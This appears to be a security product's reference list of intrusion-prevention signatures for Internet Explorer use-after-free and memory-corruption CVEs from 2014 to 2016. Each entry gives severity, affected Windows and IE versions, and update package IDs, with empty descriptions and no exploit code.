Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Windows 2008, Windows RT 8.1, Windows 8.1, Windows 2012 R2, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-02, CVE2014, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2014-0275-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2014-0282-Cinput-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Windows 2008, Windows RT 8.1, Windows 8.1, Windows 2012 R2, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-06, CVE2014, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-595-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2014-0282-Cinput-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2014-0286-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2014-02, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-565-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2014-0286-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2014-0287-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Windows 2008, Windows RT 8.1, Windows 8.1, Windows 2012 R2, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-02, CVE2014, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-569-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2014-0287-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2014-0303-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2014-03, CVE2014, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-569-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2014-0303-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2014-0307-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2014-03, CVE2014, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2014-0307-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2014-0312-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2014-03, CVE2014, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2014-0312-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2014-0313-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Windows 2008, Windows RT 8.1, Windows 8.1, Windows 2012 R2, Any Hardware, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-03, CVE2014, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-569-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2014-0313-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2014-0324-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Windows 2008, Windows RT 8.1, Windows 8.1, Windows 2012 R2, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-03, CVE2014, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-569-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2014-0324-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2014-1765-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Windows 2008, Windows RT 8.1, Windows 8.1, Windows 2012 R2, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-07, CVE2014, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-597-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2014-1765-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2014-1815-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 11.0, MS2014-05, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2014-1815-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2014-2804-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows 2012, Windows 2008, Windows 8.1, Windows 2012 R2, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2014-07, CVE2014, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-597-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2014-2804-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2014-6366-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2014-12, CVE2014, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1623-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2014-6366-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2014-8966-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2014-12, CVE2014, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1750-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2014-8966-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-0041-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-02, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-0041-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-0053-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2015-02, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-0053-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-0071-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-02, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-0071-Policy-Bypass
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-0100-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, MS2015-03, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-1435-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-0100-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-1667-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-04, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-642-5211
Last changed: sgpkg-ips-642-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1667-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-1686-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-05, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-646-5211
Last changed: sgpkg-ips-1734-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1686-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-1687

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2015-06, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-652-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1687
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-1692-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-05, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-646-5211
Last changed: sgpkg-ips-646-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1692-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-1705-Memory-Corruption

About this situation: Traffic that resembles an attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-05, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-648-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1705-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-1729-Information-Disclosure

About this situation: A vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2015-07, CVE2015, Windows not specific, Potential Disclosure
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1300-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1729-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-1730

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, MS2015-06, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-652-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1730
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-1733-Use-After-Release

About this situation: A vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1733-Use-After-Release
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-1735

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-06, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-652-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1735
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-1738-Use-After-Release

About this situation: A vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1738-Use-After-Release
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-1744

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-06, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-652-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1744
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-1745-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-06, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-654-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1745-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-1747-Write-What-Where

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2015-06, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-655-5211
Last changed: sgpkg-ips-655-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1747-Write-What-Where
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-1748

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-06, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-652-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1748
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-1750

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2015-06, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-652-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1750
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-1752

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-06, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-652-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1752
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-1766

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2015-06, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-1589-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1766
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-2372-VBArray-Use-After-Release

About this situation: A vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows 7, Any Hardware, Internet Explorer 10.0, MS2015-07, CVE2015, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-2372-VBArray-Use-After-Release
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-2383-Use-After-Release

About this situation: A vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-2383-Use-After-Release
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-2388-Misaligned-Pointer

About this situation: A vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows 7, Any Hardware, Internet Explorer 9.0, MS2015-07, CVE2015, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-2388-Misaligned-Pointer
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-2389-Use-After-Free

About this situation: A vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-2389-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-2390-Use-After-Free

About this situation: A vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-2390-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-2391-Double-Free

About this situation: A vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows 7, Any Hardware, Internet Explorer 9.0, MS2015-07, CVE2015, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-2391-Double-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-2401-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-663-5211
Last changed: sgpkg-ips-663-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-2401-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-2419-Jscript9-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-663-5211
Last changed: sgpkg-ips-1244-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-2419-Jscript9-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-2443-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows 7, Windows 2008 R2, Windows 8.1, Windows 2012 R2, Windows 10.0, Any Hardware, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-08, CVE2015, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-672-5211
Last changed: sgpkg-ips-672-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-2443-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-2444-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows 2003, Windows 7, Windows 2008 R2, Windows 8, Windows 2012, Windows 2008, Windows 8.1, Windows 2012 R2, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-08, CVE2015, Windows 2003 not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-672-5211
Last changed: sgpkg-ips-672-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-2444-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-2446-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2015-08, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-673-5211
Last changed: sgpkg-ips-673-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-2446-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-2487-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-09, CVE2015, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-2487-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-6042-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Internet Explorer 11.0, MS2015-10, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-698-5211
Last changed: sgpkg-ips-722-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-6042-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-6071-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-11, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-6071-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-6075-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2015-11, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-6075-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2015-6136-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-12, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-713-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-6136-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2016-3288-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2016-09, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-797-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2016-3288-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2016-3289

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-08, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-785-5211
Last changed: sgpkg-ips-785-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2016-3289
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-CVE-2016-3293

